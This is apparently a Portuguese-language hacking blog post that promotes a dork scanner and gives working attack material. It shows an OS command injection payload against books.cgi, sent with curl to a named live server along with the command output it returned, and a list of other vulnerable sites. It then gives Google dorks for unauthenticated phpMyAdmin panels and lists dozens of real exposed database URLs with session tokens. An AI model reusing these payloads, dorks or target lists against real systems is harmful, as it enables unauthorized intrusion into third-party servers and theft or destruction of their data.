inurl:"/books/" ext:cgi inurl:"books.cgi" "book1.txt" 
------------------------------------------------------------------------------------------  

Exemplo de achados:
http://www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file=interbook.txt&subject=%E5%A5%AA%E6%8F%83%E9%81%9C%E5%A5%AA%E8%B6%B3%E6%9D%9F%E5%A5%AA%E7%AA%B6%E8%AC%82&start=2910
www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file...txt...
http://ffg.sakura.ne.jp/ffg/book/081_120/books.cgi?file=book100.cgi&subject=%E7%AB%AA%5B%EF%BE%85%F3%BE%AC%9C&start=0
http://cgi.members.interq.or.jp/rabbit/hirotti/book/books.cgi?file=book13.txt&subject=%82%A4%82%E9%90%AF%81%7B%8C%A2%96%E9%8D%B3&start=240
http://nocturne.staba.jp/books/books.cgi?file=book2.txt&subject=%83V%83%8A%83A%83X%83X%83g%81%5B%83%8A%81%5B&start=19160
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book4.txt&subject=%82%B1%82%B1%82%EB%96%CD%97l&start=140

Comando CURL:
OS Command ('OS Command Injection')

 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|'


0xResultado:

uid=1085(spider) gid=1000(users) groups=1000(users)
 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|' * About to connect() to redsuns.x0.com port 80 (#0) *   Trying 210.188.227.146... * connected * Connected to redsuns.x0.com (210.188.227.146) port 80 (#0) > GET /webnovel/books.cgi?file=|id| HTTP/1.1 > User-Agent: curl/7.26.0 > Host: redsuns.x0.com > Accept: */* >  * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Via: 1.1 IRAQUE < Connection: Keep-Alive < Proxy-Connection: Keep-Alive < Transfer-Encoding: chunked < Date: Thu, 05 Jun 2014 16:44:24 GMT < Content-Type: text/html < Server: Apache/1.3.42 (Unix)

Usando [ SCANNER INURL ]
Usando [ SCANNER INURL ]

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => 'a href=book'
    [cmd] => nmap -sV -p 80,8080,21,22,3306 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22&num=1900&btnG=Search
    [port] => 80
)



0xRESULTADO::

TOTAL DE URL's: 71
EXPLOIT USADO:
DORK: inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
TOTAL DE POSSÍVEIS VULL: 19
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://webcache.googleusercontent.com/search?q=cache:ovc5k7pkIrwJ:http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file%3Dbook1.txt%26subject%3D%26start%3D579%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://ted.pekori.to/bbs/books/books.cgi?file=book1.txt&subject=%83%8A%83%8C%81%5B%8F%AC%90%E0%81E%96l%82%E7%82%CCPBM%94%92%8F%91&start=40
http://webcache.googleusercontent.com/search?q=cache:a2iYNKIzSvUJ:http://ted.pekori.to/bbs/books/books.cgi?file%3Dbook1.txt%26subject%3D%2583%258A%2583%258C%2581%255B%258F%25AC%2590%25E0%2581E%2596l%2582%25E7%2582%25CCPBM%2594%2592%258F%2591%26start%3D40%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=820
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=280
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=240
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=840
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=420
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%E8%5E%8F%8F%90%5C%E8%5E%BDT%E8%5E%8F%83%96%8B%FA%AC%5C%E8%5E%8F%8F%90%5C%DC%98Y&start=100
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1120
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1020
http://www.wao.or.jp/user/take123/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%83R%83%8D%83%93
http://www.scorpion.ne.jp/~kaimu/cgi-bin/books.cgi?file=book1.txt&subject=%8C%8E%82%CC%8D%CA
http://www6.airnet.ne.jp/tangent/novel/books.cgi?file=book1.txt&subject=%8AC%94n%8F%B2%82%CC%8E%96%8C%8F%95%EB
http://www.kcn.ne.jp/cgi-bin/blue/books.cgi?file=book1.txt&subject=%A5%B3%A1%BC%A5%B8
http://hccweb1.bai.ne.jp/~apaaf603/main/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%82%A0%82%AE%82%E9
http://mbl.myftp.biz/~sgon/tryhp/books1/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%93c%8C%E1%8D%EC
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1240
http://www.gifunisi.jp/cgi/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%8F%BC%93c%97D%8D%EC

SCRIPT INURL
http://pastebin.com/TzijC99y
Mais informações sobre falhas desse tipo:
http://cwe.mitre.org/data/definitions/78.html
EXPLOIT:
http://www.exploit-db.com/exploits/33494/
Ref:
http://thobias.org/doc/cgi_shell.html

quinta-feira, 29 de maio de 2014

Acessando banco de dados PHPMyAdmin sem validação

Acessando PHPMyAdmin sem validação

Acessando PHPMyAdmin sem validação


Resumo:
phpMyAdmin é um aplicativo web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.

 DORK's DE ACESSO:
 -------------------------------------------------------------------------------------------------------------------------------
inurl:"server_variables.php?token="
inurl:"/index.php?target=server_variables.php"
inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin"
inurl:"server_engines.php?token="
inurl:"server_sql.php?token="
inurl:"server_import.php?token="
inurl:"server_export.php?token="
inurl:"db_structure.php?db="
inurl:"main.php?token=" phpMyAdmin
inurl:"server_collations.php?token="
-------------------------------------------------------------------------------------------------------------------------------

Exemplo de acesso acesso:
ACESSO BANCO DE DADOS



As dorks elaboradas foram baseadas nas urls de acesso, para alguns não deve aprecer pois o painel usa um esquema com iframes com os seguintes menus-url's.


<li><a class="tab" href="server_databases.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_db.png" width="16" height="16" alt="Databases" />Databases</a></li>
<li><a class="tab" href="server_sql.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_sql.png" width="16" height="16" alt="SQL" />SQL</a></li>
<li><a class="tab" href="server_status.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_status.png" width="16" height="16" alt="Status" />Status</a></li>
<li><a class="tab" href="server_variables.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_vars.png" width="16" height="16" alt="Variables" />Variables</a></li>
<li><a class="tab" href="server_collations.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_asci.png" width="16" height="16" alt="Charsets" />Charsets</a></li>
<li><a class="tab" href="server_engines.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_engine.png" width="16" height="16" alt="Engines" />Engines</a></li>
<li><a class="tabactive" href="server_processlist.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_process.png" width="16" height="16" alt="Processes" />Processes</a></li> <li><a class="tab" href="server_export.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_export.png" width="16" height="16" alt="Export" />Export</a></li>
<li><a class="tab" href="server_import.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_import.png" width="16" height="16" alt="Import" />Import</a></li> </ul>

OBS: Algums serves não te daram acesso de imediato as tabelas, para isso use o executor de sql.
Usando SCANNER INURL para facilitar a busca.

Exemplo de comando:
php botConsole.php --host='www.google.com.br' --dork='inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla' --arquivo='MYSQL.txt' --tipoerro='2' --exploit='' --achar='phpMyAdmin'

 Usando SCANNER INURL para facilitar a busca.


DEBUG:
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla
0xEXPLOIT............:
0xARQUIVO............: MYSQL.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: phpMyAdmin
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla
    [arquivo] => MYSQL.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => phpMyAdmin
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla&num=1900&btnG=Search
    [port] => 80
)



[ BAIXAR: http://pastebin.com/TzijC99y  ] 

REF:
http://pt.wikipedia.org/wiki/PhpMyAdmin
http://www.phpmyadmin.net/


Resultados da pesquisa:

http://mech.sharif.ir/~web/phpmyadmin/server_processlist.php
http://www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
http://www.nautilus.com.br/clientes/phpmyadmin_barcessat/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=f4e23698e63cb037f9ceb9eae1bd66da
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=0717590837c536a6b2fdf71b3e3dfb69&full=1&phpMyAdmin=qSVwBZtc8J68bUpNrdmHohiwvO6
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=629550b445dd53557edc873fea8256a7&full=1&phpMyAdmin=upcVaWZRbIqzaA7ZIn2NC7tcVXa
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7850d21f77f5ff41c6a30d1468df949e&full=1&phpMyAdmin=5IeY%2C8tUFuMK6QBK-QvQoDVhkI0
http://contemar.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=25a89618f06d460b726bb902f261dc48
http://contemar.com/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=c0c6689d5bfd46016dfce6ad2e7dfc49
http://kalifaalmisnad.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d8f0843a76df17a88f489880a8a0fe86
http://webservice.jmasjuarez.gob.mx:8888/phpmyadmin/server_processlist.php?token=3b348ec6ff1b099c465f8ca203656538&full=1
https://www.der-insolvenzberater.de/phpMyAdmin/server_processlist.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&kill=209505387
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=01395f779fcfe1160c96f9eb839860af&kill=15710
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3d4354e7a691623453b29361ea95be24&kill=17812
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61a9ec4af824fbf24b368f29ba2f36d3&kill=116759
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ce58de690a926679d6b10589bb1b25a1&kill=15076
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ae7332a9388dd4763b0f9195b67ce197&kill=148286
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1d847c6be291d8428d8c828af4fde151&kill=113261
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=be9a026238ab69f456c53337318599a3&kill=22662
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=161b1d193b0032814d65f117af4074cb&kill=12862
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3ba1c5db1b7c429310ca466d8a3a4f9a&kill=108535
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1de9baadfb04138dcc81eb84d4b45421&kill=11170
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1bd8be911d5ea86940f12a7e7bd314c7&kill=15121
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6b7d94bc8ead69989a5029f85594ac28&kill=11628
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=615dee42fa4bb4f27dadb0fc5443a126&kill=14768
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=79d1803b895548651c481a7358109955&kill=171800
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=dde1ce380bf8aef5e540b98d03c71f82&kill=49081
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5e5761963c4f8e162ef84d9c1314426b&kill=28424
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=fe769b489d3faa1af424d7f494a2fd7b&kill=5552
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=81809c221f69540df71746d8a4974216&kill=115784
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7bd07acd4c06d737d445184c2daa9934&kill=154635
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3023cf534d907c3096a907c26f2b31df&kill=17227
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=28b024572f0f02fa5540619532cc448c&kill=12683
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61415fd5a6703bff296bd9a95b186a9c&kill=30052
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=87ad999dfd8e1e831ee4d8a7a4fdc6be&kill=4724
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=a5c70b6418a08d53b441f85aba7ab469&kill=16152
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=08c87f19ccbea81587423b4c7658a17e&kill=14637
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b17527ee7093814acd79faef0ca0642a&kill=17173
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=15c68c757f728a341a8e670a6dec1f74&kill=12618
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d4b87d5771681e2677becd9cfa8cc42b&kill=730
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d52749f3c3fa8de4f3cb4c692ee27bc1&kill=15447
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9c4973ed00c81fea82949e86074767da&kill=10851
http://royaltouchny.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b64ac0249e08905103b6c694b46d209b
http://www.elektro-denker.com/phpMyAdmin-elebwbvm/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6788654e634886ee9ca4ca18818a7f99&full=1
www.elektro-denker.com
www.elektro-denker.com/
http://202.137.230.154/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=04f7d18dd41feabf6f193ce98845d0e7
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=ef4ce41cc7bb19fa4216a8d1fd89b2a5&kill=84848
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=28e762b909008475fa0df0b505d9594d&kill=90009
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=d54040fd24f287358e5c83e51d41005a&kill=82080
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=dbff09ac97b69ce0b6647a1aed5b9424&kill=82182
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=03aa0d1eb55f9506a963c6b3f7222362&kill=88181
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=b83e7763a2d3035eadf0a3f6c5c20827&kill=80865
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=16599770
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=3127566
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=2344240
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=17134474
http://118.97.147.162/phpmyadmin/server_processlist.php?token=914db90734e2ffdf1ae593444fac693a
http://www.rocketys.net/server_processlist.php?token=6fe896b38b75bc846cefc533fa18b8b9
www.rocketys.net
www.rocketys.net/
http://made-in-dk.eu/phpMyAdmin-knoktfdu4/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5a55615d2a73c3ee8e79741f1c27c637&kill=35563628
http://maxxyz.de/server_processlist.php?token=a863cfb68b631c080e3e289b75dfee9c
http://www.self.org.uk/server_processlist.php?token=5bfb8e5316455b364516652ae3fd34cb
www.self.org.uk
www.self.org.uk/
http://itarget.fr/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1a8151db903b7e9cf2a0ee3ea2815bd4
http://xellnaga.free.fr/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61023193d1a9303ab9c0a9fa397ef1cd
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=2711119
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=80890
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=500730
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=3333&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=14037&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91